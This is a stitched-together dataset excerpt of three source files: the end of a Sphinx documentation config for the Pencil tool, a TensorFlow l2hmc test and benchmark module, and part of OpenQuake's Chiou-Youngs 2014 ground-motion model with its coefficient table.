# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# 'default' is only a placeholder: when building outside ReadTheDocs we
# switch to the locally installed sphinx_rtd_theme (RTD provides the theme
# itself in its own build environment, see on_readthedocs above).
html_theme = 'default'

if not on_readthedocs:
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Pencildoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Pencil.tex', u'Pencil Documentation',
u'Pencil Contributors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pencil', u'Pencil Documentation',
[u'Pencil Contributors'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Pencil', u'Pencil Documentation',
u'Pencil Contributors', 'Pencil', 'Multi-platform GUI Prototyping/Wireframing',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| gpl-2.0 |
Bismarrck/tensorflow | tensorflow/contrib/eager/python/examples/l2hmc/l2hmc_test.py | 23 | 8259 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests l2hmc fit to 2D strongly correlated Gaussian executed eagerly."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy.random as npr
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from tensorflow.contrib.eager.python.examples.l2hmc import l2hmc
def get_default_hparams():
  """Default hyperparameters for the l2hmc tests and benchmarks."""
  defaults = dict(
      x_dim=2,
      n_samples=200,
      n_steps=10,
      eps=.1,
      n_iters=10,
      learning_rate=.0003,
      n_warmup_iters=3)
  return tf.contrib.training.HParams(**defaults)
def step(dynamics, optimizer, samples):
  """Run a single optimization step; returns (loss, updated samples)."""
  loss, grads, new_samples, _ = l2hmc.loss_and_grads(
      dynamics, samples, loss_fn=l2hmc.compute_loss)
  pairs = list(zip(grads, dynamics.variables))
  optimizer.apply_gradients(pairs)
  return loss, new_samples
# To be defunnable, the function cannot return an Operation, so the above
# function is used for defun or eager, and this function is used in graph to be
# able to run the gradient updates.
def graph_step(dynamics, optimizer, samples):
  """Graph-mode variant of `step` that also returns the train op."""
  loss, grads, new_samples, _ = l2hmc.loss_and_grads(
      dynamics, samples, loss_fn=l2hmc.compute_loss)
  pairs = list(zip(grads, dynamics.variables))
  train_op = optimizer.apply_gradients(pairs)
  return train_op, loss, new_samples
def warmup(dynamics, optimizer, n_iters=1, n_samples=200, step_fn=step):
  """Run a few throwaway optimization steps so that later timings exclude
  one-time initialization overhead."""
  shape = [n_samples, dynamics.x_dim]
  samples = tf.random_normal(shape=shape, dtype=tf.float32)
  iteration = 0
  while iteration < n_iters:
    _, samples = step_fn(dynamics, optimizer, samples)
    iteration += 1
def fit(dynamics, samples, optimizer, step_fn=step, n_iters=5000,
        verbose=True, logdir=None):
  """Fit the L2HMC sampler, optionally logging the loss to TensorBoard.

  A summary writer is only created when `logdir` is given.
  """
  writer = tf.contrib.summary.create_file_writer(logdir) if logdir else None

  for it in range(n_iters):
    loss, samples = step_fn(dynamics, optimizer, samples)
    if verbose:
      print("Iteration %d: loss %.4f" % (it, loss))
    if writer is not None:
      with writer.as_default(), \
          tf.contrib.summary.always_record_summaries():
        tf.contrib.summary.scalar("loss", loss)
class L2hmcTest(tf.test.TestCase):
  """Unit tests for l2hmc in both eager and graph mode."""

  def test_apply_transition(self):
    """Testing function `Dynamics.apply_transition` in graph and eager mode.

    Only shapes are checked -- the transition itself is stochastic, so
    exact values cannot be pinned down.
    """
    # Eager mode testing
    hparams = get_default_hparams()
    energy_fn, _, _ = l2hmc.get_scg_energy_fn()
    dynamics = l2hmc.Dynamics(
        x_dim=hparams.x_dim,
        minus_loglikelihood_fn=energy_fn,
        n_steps=hparams.n_steps,
        eps=hparams.eps)
    samples = tf.random_normal(shape=[hparams.n_samples, hparams.x_dim])
    x_, v_, x_accept_prob, x_out = dynamics.apply_transition(samples)

    self.assertEqual(x_.shape, v_.shape)
    self.assertEqual(x_out.shape, samples.shape)
    self.assertEqual(x_.shape, x_out.shape)
    self.assertEqual(x_accept_prob.shape, (hparams.n_samples,))

    # Graph mode testing: same checks, but built as placeholders and run
    # through an explicit session.
    with tf.Graph().as_default():
      energy_fn, _, _ = l2hmc.get_scg_energy_fn()
      dynamics = l2hmc.Dynamics(
          x_dim=hparams.x_dim,
          minus_loglikelihood_fn=energy_fn,
          n_steps=hparams.n_steps,
          eps=hparams.eps)
      x = tf.placeholder(tf.float32, shape=[None, hparams.x_dim])
      x_, v_, x_accept_prob, x_out = dynamics.apply_transition(x)
      samples = npr.normal(size=[hparams.n_samples, hparams.x_dim])

      with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        np_x_, np_v_, np_x_accept_prob, np_x_out = sess.run(
            [x_, v_, x_accept_prob, x_out], feed_dict={x: samples})

        self.assertEqual(np_x_.shape, np_v_.shape)
        self.assertEqual(samples.shape, np_x_out.shape)
        self.assertEqual(np_x_.shape, np_x_out.shape)
        self.assertEqual(np_x_accept_prob.shape, (hparams.n_samples,))
class L2hmcBenchmark(tf.test.Benchmark):
  """Eager and graph benchmarks for l2hmc."""

  def benchmark_graph(self):
    """Benchmark Graph performance."""
    hparams = get_default_hparams()
    tf.enable_resource_variables()
    for sample_size in [10, 25, 50, 100, 200]:
      hparams.n_samples = sample_size
      # A fresh Graph per sample size keeps runs independent; the original
      # also called tf.reset_default_graph() here, which is redundant when
      # all ops are created inside an explicit Graph context.
      with tf.Graph().as_default():
        energy_fn, _, _ = l2hmc.get_scg_energy_fn()
        x = tf.random_normal([hparams.n_samples, hparams.x_dim],
                             dtype=tf.float32)
        dynamics = l2hmc.Dynamics(
            x_dim=hparams.x_dim,
            minus_loglikelihood_fn=energy_fn,
            n_steps=hparams.n_steps,
            eps=hparams.eps)
        optimizer = tf.train.AdamOptimizer(learning_rate=hparams.learning_rate)
        # graph_step builds the loss itself; the original additionally called
        # l2hmc.compute_loss(dynamics, x) and immediately overwrote the
        # result, which only added dead ops to the benchmarked graph.
        train_op, loss, _ = graph_step(dynamics, optimizer, x)

        # Single thread; fairer comparison against eager
        session_conf = tf.ConfigProto(inter_op_parallelism_threads=1)
        with tf.Session(config=session_conf) as sess:
          sess.run(tf.global_variables_initializer())

          # Warmup to reduce initialization effect when timing
          for _ in range(hparams.n_warmup_iters):
            _, _ = sess.run([train_op, loss])

          # Training
          start_time = time.time()
          for i in range(hparams.n_iters):
            _, loss_np = sess.run([train_op, loss])
            print("Iteration %d: loss %.4f" % (i, loss_np))
          wall_time = (time.time() - start_time) / hparams.n_iters
          examples_per_sec = hparams.n_samples / wall_time

          self.report_benchmark(
              name="graph_train_%s_%d" %
              ("gpu" if tf.test.is_gpu_available() else "cpu", sample_size),
              iters=hparams.n_iters,
              extras={"examples_per_sec": examples_per_sec},
              wall_time=wall_time)

  def benchmark_eager(self):
    """Benchmark eager performance without defun compilation."""
    self._benchmark_eager()

  def benchmark_eager_defun(self):
    """Benchmark eager performance with the step function defun-compiled."""
    self._benchmark_eager(defun=True)

  def _benchmark_eager(self, defun=False):
    """Benchmark Eager performance.

    Args:
      defun: if True, wrap the training step in tfe.defun for graph-function
        compilation before timing.
    """
    hparams = get_default_hparams()
    for sample_size in [10, 25, 50, 100, 200]:
      hparams.n_samples = sample_size
      energy_fn, _, _ = l2hmc.get_scg_energy_fn()
      dynamics = l2hmc.Dynamics(
          x_dim=hparams.x_dim,
          minus_loglikelihood_fn=energy_fn,
          n_steps=hparams.n_steps,
          eps=hparams.eps)
      optimizer = tf.train.AdamOptimizer(learning_rate=hparams.learning_rate)
      step_fn = tfe.defun(step) if defun else step

      # Warmup to reduce initialization effect when timing
      warmup(
          dynamics,
          optimizer,
          n_iters=hparams.n_warmup_iters,
          n_samples=hparams.n_samples,
          step_fn=step_fn)

      # Training
      samples = tf.random_normal(
          shape=[hparams.n_samples, hparams.x_dim], dtype=tf.float32)
      start_time = time.time()
      fit(dynamics,
          samples,
          optimizer,
          step_fn=step_fn,
          n_iters=hparams.n_iters)
      wall_time = (time.time() - start_time) / hparams.n_iters
      examples_per_sec = hparams.n_samples / wall_time

      self.report_benchmark(
          name="eager_train_%s%s_%d" %
          ("gpu" if tf.test.is_gpu_available() else "cpu",
           "_defun" if defun else "", sample_size),
          iters=hparams.n_iters,
          extras={"examples_per_sec": examples_per_sec},
          wall_time=wall_time)

      # Drop the per-size network before building the next one.
      del dynamics


if __name__ == "__main__":
  tf.enable_eager_execution()
  tf.test.main()
| apache-2.0 |
gem/oq-hazardlib | openquake/hazardlib/gsim/chiou_youngs_2014.py | 1 | 21363 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2012-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`ChiouYoungs2014`.
"""
from __future__ import division
import numpy as np
import math
from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, PGV, SA
class ChiouYoungs2014(GMPE):
    """
    Implements GMPE developed by Brian S.-J. Chiou and Robert R. Youngs
    and published as "Updated of the Chiou and Youngs NGA Model for the
    Average Horizontal Component of Peak Ground Motion and Response Spectra"
    (2014, Earthquake Spectra).
    """
    #: Supported tectonic region type is active shallow crust
    DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST

    #: Supported intensity measure types are spectral acceleration,
    #: peak ground velocity and peak ground acceleration
    DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
        PGA,
        PGV,
        SA
    ])

    #: Supported intensity measure component is orientation-independent
    #: measure :attr:`~openquake.hazardlib.const.IMC.RotD50`,
    DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RotD50

    #: Supported standard deviation types are inter-event, intra-event
    #: and total, see chapter "Variance model".
    DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
        const.StdDev.TOTAL,
        const.StdDev.INTER_EVENT,
        const.StdDev.INTRA_EVENT
    ])

    #: Required site parameters are Vs30, Vs30 measured flag
    #: and Z1.0 (depth to the 1.0 km/s shear-wave velocity horizon).
    REQUIRES_SITES_PARAMETERS = set(('vs30', 'vs30measured', 'z1pt0'))

    #: Required rupture parameters are magnitude, rake,
    #: dip and ztor (depth to top of rupture).
    REQUIRES_RUPTURE_PARAMETERS = set(('dip', 'rake', 'mag', 'ztor'))

    #: Required distance measures are RRup, Rjb and Rx.
    REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx'))
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
# extracting dictionary of coefficients specific to required
# intensity measure type.
C = self.COEFFS[imt]
# intensity on a reference soil is used for both mean
# and stddev calculations.
ln_y_ref = self._get_ln_y_ref(rup, dists, C)
# exp1 and exp2 are parts of eq. 12 and eq. 13,
# calculate it once for both.
exp1 = np.exp(C['phi3'] * (sites.vs30.clip(-np.inf, 1130) - 360))
exp2 = np.exp(C['phi3'] * (1130 - 360))
mean = self._get_mean(sites, C, ln_y_ref, exp1, exp2)
stddevs = self._get_stddevs(sites, rup, C, stddev_types,
ln_y_ref, exp1, exp2)
return mean, stddevs
    def _get_mean(self, sites, C, ln_y_ref, exp1, exp2):
        """
        Add site effects to an intensity.

        Implements eq. 13b.

        :param ln_y_ref: intensity on reference rock (output of
            :meth:`_get_ln_y_ref`)
        :param exp1: precomputed ``exp(phi3 * (min(vs30, 1130) - 360))``
        :param exp2: precomputed ``exp(phi3 * (1130 - 360))``
        """
        # we do not support estimating of basin depth and instead
        # rely on it being available (since we require it).
        # centered_z1pt0
        centered_z1pt0 = self._get_centered_z1pt0(sites)

        # we consider random variables being zero since we want
        # to find the exact mean value.
        eta = epsilon = 0.

        ln_y = (
            # first line of eq. 12
            ln_y_ref + eta
            # second line: linear vs30 scaling, zero above 1130 m/s
            + C['phi1'] * np.log(sites.vs30 / 1130).clip(-np.inf, 0)
            # third line: nonlinear site response
            + C['phi2'] * (exp1 - exp2)
            * np.log((np.exp(ln_y_ref) * np.exp(eta) + C['phi4']) / C['phi4'])
            # fourth line: basin depth (z1.0) term
            + C['phi5']
            * (1.0 - np.exp(-1. * centered_z1pt0 / C['phi6']))
            # fifth line
            + epsilon
        )
        return ln_y
    def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2):
        """
        Get standard deviation for a given intensity on reference soil.

        Implements equations 13 for inter-event, intra-event
        and total standard deviations.

        Returns one array per requested type, in the order of
        ``stddev_types``.
        """
        # indicator arrays: 1 where vs30 was measured, 1 where inferred
        Fmeasured = sites.vs30measured
        Finferred = 1 - sites.vs30measured

        # eq. 13 to calculate inter-event standard error;
        # magnitude is clipped to [5.0, 6.5] and shifted to [0, 1.5]
        mag_test = min(max(rup.mag, 5.0), 6.5) - 5.0
        tau = C['tau1'] + (C['tau2'] - C['tau1']) / 1.5 * mag_test

        # b and c coeffs from eq. 10
        b = C['phi2'] * (exp1 - exp2)
        c = C['phi4']

        y_ref = np.exp(ln_y_ref)
        # eq. 13: NL is the nonlinear site-response scaling of variability
        NL = b * y_ref / (y_ref + c)
        sigma = ((C['sig1'] + (C['sig2'] - C['sig1']) * mag_test / 1.5)
                 * np.sqrt((C['sig3'] * Finferred + 0.7 * Fmeasured) +
                           (1. + NL) ** 2.))

        ret = []
        for stddev_type in stddev_types:
            assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
            if stddev_type == const.StdDev.TOTAL:
                # eq. 13: combine inter- and intra-event parts
                ret += [np.sqrt(((1 + NL) ** 2) * (tau ** 2) + (sigma ** 2))]
            elif stddev_type == const.StdDev.INTRA_EVENT:
                ret.append(sigma)
            elif stddev_type == const.StdDev.INTER_EVENT:
                # this is implied in eq. 21
                ret.append(np.abs((1 + NL) * tau))
        return ret
def _get_ln_y_ref(self, rup, dists, C):
"""
Get an intensity on a reference soil.
Implements eq. 13a.
"""
# reverse faulting flag
Frv = 1. if 30 <= rup.rake <= 150 else 0.
# normal faulting flag
Fnm = 1. if -120 <= rup.rake <= -60 else 0.
# hanging wall flag
Fhw = np.zeros_like(dists.rx)
idx = np.nonzero(dists.rx >= 0.)
Fhw[idx] = 1.
# a part in eq. 11
mag_test1 = np.cosh(2. * max(rup.mag - 4.5, 0))
# centered DPP
centered_dpp = self._get_centered_cdpp(dists)
# centered_ztor
centered_ztor = self._get_centered_ztor(rup, Frv)
#
dist_taper = np.fmax(1 - (np.fmax(dists.rrup - 40,
np.zeros_like(dists)) / 30.),
np.zeros_like(dists))
dist_taper = dist_taper.astype(np.float64)
ln_y_ref = (
# first part of eq. 11
C['c1']
+ (C['c1a'] + C['c1c'] / mag_test1) * Frv
+ (C['c1b'] + C['c1d'] / mag_test1) * Fnm
+ (C['c7'] + C['c7b'] / mag_test1) * centered_ztor
+ (C['c11'] + C['c11b'] / mag_test1) *
np.cos(math.radians(rup.dip)) ** 2
# second part
+ C['c2'] * (rup.mag - 6)
+ ((C['c2'] - C['c3']) / C['cn'])
* np.log(1 + np.exp(C['cn'] * (C['cm'] - rup.mag)))
# third part
+ C['c4']
* np.log(dists.rrup + C['c5']
* np.cosh(C['c6'] * max(rup.mag - C['chm'], 0)))
+ (C['c4a'] - C['c4'])
* np.log(np.sqrt(dists.rrup ** 2 + C['crb'] ** 2))
# forth part
+ (C['cg1'] + C['cg2'] / (np.cosh(max(rup.mag - C['cg3'], 0))))
* dists.rrup
# fifth part
+ C['c8'] * dist_taper
* min(max(rup.mag - 5.5, 0) / 0.8, 1.0)
* np.exp(-1 * C['c8a'] * (rup.mag - C['c8b']) ** 2) * centered_dpp
# sixth part
+ C['c9'] * Fhw * np.cos(math.radians(rup.dip)) *
(C['c9a'] + (1 - C['c9a']) * np.tanh(dists.rx / C['c9b']))
* (1 - np.sqrt(dists.rjb ** 2 + rup.ztor ** 2)
/ (dists.rrup + 1.0))
)
return ln_y_ref
def _get_centered_z1pt0(self, sites):
"""
Get z1pt0 centered on the Vs30- dependent avarage z1pt0(m)
California and non-Japan regions
"""
#: California and non-Japan regions
mean_z1pt0 = (-7.15 / 4.) * np.log(((sites.vs30) ** 4. + 570.94 ** 4.)
/ (1360 ** 4. + 570.94 ** 4.))
centered_z1pt0 = sites.z1pt0 - np.exp(mean_z1pt0)
return centered_z1pt0
def _get_centered_ztor(self, rup, Frv):
"""
Get ztor centered on the M- dependent avarage ztor(km)
by different fault types.
"""
if Frv == 1:
mean_ztor = max(2.704 - 1.226 * max(rup.mag - 5.849, 0.0), 0.) ** 2
centered_ztor = rup.ztor - mean_ztor
else:
mean_ztor = max(2.673 - 1.136 * max(rup.mag - 4.970, 0.0), 0.) ** 2
centered_ztor = rup.ztor - mean_ztor
return centered_ztor
def _get_centered_cdpp(self, dists):
"""
Get directivity prediction parameter centered on the avgerage
directivity prediction parameter. Here we set the centered_dpp
equals to zero, since the near fault directivity effect prediction is
off in our calculation.
"""
centered_dpp = 0.
return centered_dpp
#: Coefficient tables are constructed from values in tables 1 - 5
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c1a c1b c1c c1d cn cm c2 c3 c4 c4a crb c5 chm c6 c7 c7b c8 c8a c8b c9 c9a c9b c11 c11b cg1 cg2 cg3 phi1 phi2 phi3 phi4 phi5 phi6 gjpit gwn phi1jp phi5jp phi6jp tau1 tau2 sig1 sig2 sig3 sig2jp
pga -1.5065 0.165 -0.255 -0.165 0.255 16.0875 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0956 0.4908 0.0352 0.0462 0. 0.2695 0.4833 0.9228 0.1202 6.8607 0. -0.4536 -0.007146 -0.006758 4.2542 -0.521 -0.1417 -0.00701 0.102151 0. 300 1.5817 0.7594 -0.6846 0.459 800. 0.4 0.26 0.4912 0.3762 0.8 0.4528
pgv 2.3549 0.165 -0.0626 -0.165 0.0626 3.3024 5.423 1.06 2.3152 -2.1 -0.5 50 5.8096 3.0514 0.4407 0.0324 0.0097 0.2154 0.2695 5. 0.3079 0.1 6.5 0 -0.3834 -0.001852 -0.007403 4.3439 -0.7936 -0.0699 -0.008444 5.41 0.0202 300. 2.2306 0.335 -0.7966 0.9488 800. 0.3894 0.2578 0.4785 0.3629 0.7504 0.3918
0.01 -1.5065 0.165 -0.255 -0.165 0.255 16.0875 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0956 0.4908 0.0352 0.0462 0. 0.2695 0.4833 0.9228 0.1202 6.8607 0. -0.4536 -0.007146 -0.006758 4.2542 -0.521 -0.1417 -0.00701 0.102151 0. 300 1.5817 0.7594 -0.6846 0.459 800. 0.4 0.26 0.4912 0.3762 0.8 0.4528
0.02 -1.4798 0.165 -0.255 -0.165 0.255 15.7118 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0963 0.4925 0.0352 0.0472 0. 0.2695 1.2144 0.9296 0.1217 6.8697 0. -0.4536 -0.007249 -0.006758 4.2386 -0.5055 -0.1364 -0.007279 0.10836 0. 300 1.574 0.7606 -0.6681 0.458 800. 0.4026 0.2637 0.4904 0.3762 0.8 0.4551
0.03 -1.2972 0.165 -0.255 -0.165 0.255 15.8819 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0974 0.4992 0.0352 0.0533 0. 0.2695 1.6421 0.9396 0.1194 6.9113 0. -0.4536 -0.007869 -0.006758 4.2519 -0.4368 -0.1403 -0.007354 0.119888 0. 300 1.5544 0.7642 -0.6314 0.462 800. 0.4063 0.2689 0.4988 0.3849 0.8 0.4571
0.04 -1.1007 0.165 -0.255 -0.165 0.255 16.4556 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0988 0.5037 0.0352 0.0596 0. 0.2695 1.9456 0.9661 0.1166 7.0271 0. -0.4536 -0.008316 -0.006758 4.296 -0.3752 -0.1591 -0.006977 0.133641 0. 300 1.5502 0.7676 -0.5855 0.453 800. 0.4095 0.2736 0.5049 0.391 0.8 0.4642
0.05 -0.9292 0.165 -0.255 -0.165 0.255 17.6453 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.1011 0.5048 0.0352 0.0639 0. 0.2695 2.181 0.9794 0.1176 7.0959 0. -0.4536 -0.008743 -0.006758 4.3578 -0.3469 -0.1862 -0.006467 0.148927 0. 300 1.5391 0.7739 -0.5457 0.436 800. 0.4124 0.2777 0.5096 0.3957 0.8 0.4716
0.075 -0.658 0.165 -0.254 -0.165 0.254 20.1772 5.0031 1.06 1.9636 -2.1 -0.5 50 6.4551 3.1094 0.5048 0.0352 0.063 0. 0.2695 2.6087 1.026 0.1171 7.3298 0. -0.4536 -0.009537 -0.00619 4.5455 -0.3747 -0.2538 -0.005734 0.190596 0. 300 1.4804 0.7956 -0.4685 0.383 800. 0.4179 0.2855 0.5179 0.4043 0.8 0.5022
0.1 -0.5613 0.165 -0.253 -0.165 0.253 19.9992 5.0172 1.06 1.9636 -2.1 -0.5 50 6.8305 3.2381 0.5048 0.0352 0.0532 0. 0.2695 2.9122 1.0177 0.1146 7.2588 0. -0.4536 -0.00983 -0.005332 4.7603 -0.444 -0.2943 -0.005604 0.230662 0. 300 1.4094 0.7932 -0.4985 0.375 800. 0.4219 0.2913 0.5236 0.4104 0.8 0.523
0.12 -0.5342 0.165 -0.252 -0.165 0.252 18.7106 5.0315 1.06 1.9795 -2.1 -0.5 50 7.1333 3.3407 0.5048 0.0352 0.0452 0. 0.2695 3.1045 1.0008 0.1128 7.2372 0. -0.4536 -0.009913 -0.004732 4.8963 -0.4895 -0.3077 -0.005696 0.253169 0. 300 1.3682 0.7768 -0.5603 0.377 800. 0.4244 0.2949 0.527 0.4143 0.8 0.5278
0.15 -0.5462 0.165 -0.25 -0.165 0.25 16.6246 5.0547 1.06 2.0362 -2.1 -0.5 50 7.3621 3.43 0.5045 0.0352 0.0345 0. 0.2695 3.3399 0.9801 0.1106 7.2109 0. -0.4536 -0.009896 -0.003806 5.0644 -0.5477 -0.3113 -0.005845 0.266468 0. 300 1.3241 0.7437 -0.6451 0.379 800. 0.4275 0.2993 0.5308 0.4191 0.8 0.5304
0.17 -0.5858 0.165 -0.248 -0.165 0.248 15.3709 5.0704 1.06 2.0823 -2.1 -0.5 50 7.4365 3.4688 0.5036 0.0352 0.0283 0. 0.2695 3.4719 0.9652 0.115 7.2491 0. -0.4536 -0.009787 -0.00328 5.1371 -0.5922 -0.3062 -0.005959 0.26506 0. 300 1.3071 0.7219 -0.6981 0.38 800. 0.4292 0.3017 0.5328 0.4217 0.8 0.531
0.2 -0.6798 0.165 -0.2449 -0.165 0.2449 13.7012 5.0939 1.06 2.1521 -2.1 -0.5 50 7.4972 3.5146 0.5016 0.0352 0.0202 0. 0.2695 3.6434 0.9459 0.1208 7.2988 0. -0.444 -0.009505 -0.00269 5.188 -0.6693 -0.2927 -0.006141 0.255253 0. 300 1.2931 0.6922 -0.7653 0.384 800. 0.4313 0.3047 0.5351 0.4252 0.8 0.5312
0.25 -0.8663 0.165 -0.2382 -0.165 0.2382 11.2667 5.1315 1.06 2.2574 -2.1 -0.5 50 7.5416 3.5746 0.4971 0.0352 0.009 0. 0.2695 3.8787 0.9196 0.1208 7.3691 0. -0.3539 -0.008918 -0.002128 5.2164 -0.7766 -0.2662 -0.006439 0.231541 0. 300 1.315 0.6579 -0.8469 0.393 800. 0.4341 0.3087 0.5377 0.4299 0.7999 0.5309
0.3 -1.0514 0.165 -0.2313 -0.165 0.2313 9.1908 5.167 1.06 2.344 -2.1 -0.5 50 7.56 3.6232 0.4919 0.0352 -0.0004 0. 0.2695 4.0711 0.8829 0.1175 6.8789 0. -0.2688 -0.008251 -0.001812 5.1954 -0.8501 -0.2405 -0.006704 0.207277 0.001 300 1.3514 0.6362 -0.8999 0.408 800. 0.4363 0.3119 0.5395 0.4338 0.7997 0.5307
0.4 -1.3794 0.165 -0.2146 -0.165 0.2146 6.5459 5.2317 1.06 2.4709 -2.1 -0.5 50 7.5735 3.6945 0.4807 0.0352 -0.0155 0. 0.2695 4.3745 0.8302 0.106 6.5334 0. -0.1793 -0.007267 -0.001274 5.0899 -0.9431 -0.1975 -0.007125 0.165464 0.004 300 1.4051 0.6049 -0.9618 0.462 800. 0.4396 0.3165 0.5422 0.4399 0.7988 0.531
0.5 -1.6508 0.165 -0.1972 -0.165 0.1972 5.2305 5.2893 1.06 2.5567 -2.1 -0.5 50 7.5778 3.7401 0.4707 0.0352 -0.0278 0.0991 0.2695 4.6099 0.7884 0.1061 6.526 0. -0.1428 -0.006492 -0.001074 4.7854 -1.0044 -0.1633 -0.007435 0.133828 0.01 300 1.4402 0.5507 -0.9945 0.524 800. 0.4419 0.3199 0.5433 0.4446 0.7966 0.5313
0.75 -2.1511 0.165 -0.162 -0.165 0.162 3.7896 5.4109 1.06 2.6812 -2.1 -0.5 50 7.5808 3.7941 0.4575 0.0352 -0.0477 0.1982 0.2695 5.0376 0.6754 0.1 6.5 0. -0.1138 -0.005147 -0.001115 4.3304 -1.0602 -0.1028 -0.00812 0.085153 0.034 300 1.528 0.3582 -1.0225 0.658 800. 0.4459 0.3255 0.5294 0.4533 0.7792 0.5309
1 -2.5365 0.165 -0.14 -0.165 0.14 3.3024 5.5106 1.06 2.7474 -2.1 -0.5 50 7.5814 3.8144 0.4522 0.0352 -0.0559 0.2154 0.2695 5.3411 0.6196 0.1 6.5 0. -0.1062 -0.004277 -0.001197 4.1667 -1.0941 -0.0699 -0.008444 0.058595 0.067 300 1.6523 0.2003 -1.0002 0.78 800. 0.4484 0.3291 0.5105 0.4594 0.7504 0.5302
